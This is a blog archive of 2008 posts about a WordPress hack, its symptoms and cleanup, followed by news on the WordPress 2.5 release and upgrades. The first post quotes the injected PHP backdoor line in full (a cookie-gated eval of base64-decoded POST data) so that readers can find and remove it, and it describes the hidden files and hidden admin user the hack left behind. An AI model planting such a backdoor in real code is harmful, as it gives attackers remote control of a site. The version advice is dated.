Has Your WordPress Been Hacked Recently?
Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:
Extra code added to the first line of PHP files
<?php if(md5($_COOKIE['_wp_debugger'])==”dfa1bcf40aa72fdb46ed40f7651fe76e”){ eval(base64_decode($_POST['file'])); exit; } ?>
Note that the letters numbers and numbers vary.
Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.
New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories
See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.
Solution: delete the files.
New files named wp-info.txt which contain database usernames and passwords
This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.
Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.
New “WordPress” user in database (hidden in the admin panel users page)
One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.
Solution: delete the user. You need to access your database through phpMyAdmin or something similar.
WordPress version changed to 2.5
I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.
Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.
More signs
The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.
Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.
More Solutions
When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.
However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!
Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.
I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.
Update (April 17): There’s now a WordPress Codex page for this issue.
Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).
Update (June 10): Check out this very helpful post by Donncha O Caoimh.
Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed
Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.
Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.
Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.
I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!
WordPress 2.5 Released
The long-awaited version of WordPress is finally here! WordPress 2.5 “Brecker” was released last March 29, and just about the same time the official WordPress website got a makeover to match the new administration panel.
2.5 is a major milestone for WordPress not because it added dozens of user-requested features, but because it reaffirms that we’re as passionate about blogging as the day we started. Our community is too fierce to rest on its laurels — contrary to what pundits claim, blogging is far from “finished” and every improvement just whets our appetite for more. And more is coming.
Version 2.5 had two release candidates before the final version and tons of discussions about its upcoming features, so those who have been keeping up-to-date probably already know what to expect. For those who don’t, better read it straight from the horse’s mouth. Here’s a shortlist:
User Features
- Cleaner, faster, less cluttered dashboard
- Dashboard Widgets
- Multi-file upload with progress bar
- EXIF extraction
- Search posts and pages
- Tag management
- Password strength meter
- Concurrent editing protection
- Few-click plugin upgrades
- Friendlier visual post editor
- Built-in galleries
Developer Features
- Salted passwords
- Secure cookies
- Easy taxonomy and URL creation
- Inline documentation
- Database optimization
- $wpdb->prepare()
- Media buttons
- Shortcode API
Theme and plugin issues shouldn’t be too major, but to be sure just check out the Codex for that.
WordPress 2.5 Delayed!
Weblog Tools Collection reports that the much-awaited release of WordPress 2.5 has been delayed by a week. People have written countless posts about preparing for taking this major leap (especially since it skipped 2.4), while some are still hesitating.
According to the WordPress Trac, the WordPress team has reached only 58%, or closed 560 out of 966 tickets, so far. Here’s hoping there will be no more delays—or not, since you might be breathing a sigh of relief as you won’t have to scramble to update your site just yet.
WordPress 2.5 is now due on March 17, 2008.
WordPress 2.5 is Coming!
The WordPress community is buzzing about the WordPress 2.5 demo site, which is under heavy scrutiny, not to mention lots of malicious hackery. Still, it’s worth a look.
For those who don’t know, the developers are skipping WP 2.4 and heading straight to a version 2.5 release this March 10th. The Blog Herald has a great overview of all the things that need to be updated, be it themes or plugins, once WordPress 2.5 arrives. Of course, you can always check out the WordPress Codex page on the same topic.
WordPress Plugin: WordPress Automatic Upgrade
WordPress is pretty easy to install, but I’ve always hesitated to upgrade to the latest version, no matter how many times I’ve done so in the past. So imagine my sigh of relief when I discovered the WordPress Automatic Upgrade plugin.
Once activated, just head over to the plugin page (Manage > Automatic Upgrade) to begin the update. Here’s an idea of what the plugin does:
- Backs up the files and makes available a link to download it.
- Backs up the database and makes available a link to download it.
- Downloads the latest files from http://wordpress.org/latest.zip and unzips it.
- Puts the site in maintenance mode.
- De-activates all active plugins and remembers it.
- Upgrades wordpress files.
- Gives you a link that will open in a new window to upgrade installation.
- Re-activates the plugins.
The plugin can also can be run in a automated mode where in you do not have to click on any links to go to the next step.
Download WordPress Automatic Upgrade
Update to WordPress 2.3.3 Now!
Two months after the last upgrade, WordPress 2.3.3 is an urgent security release. It addresses an XML-RPC vulnerability that allows any user to edit any other user’s posts in the same blog, as well as some other bug fixes.
Now if updating seems too much of a chore right now and you only care about keeping your blog secure, get the updated xmlrpc.php file and you’re good to go.
Check out the whole announcement at the official WordPress blog.
WordPress 2.3.1
The latest stable release of WordPress as of this writing is 2.3.1. Changes from the previous version were mostly security and bug fixes.
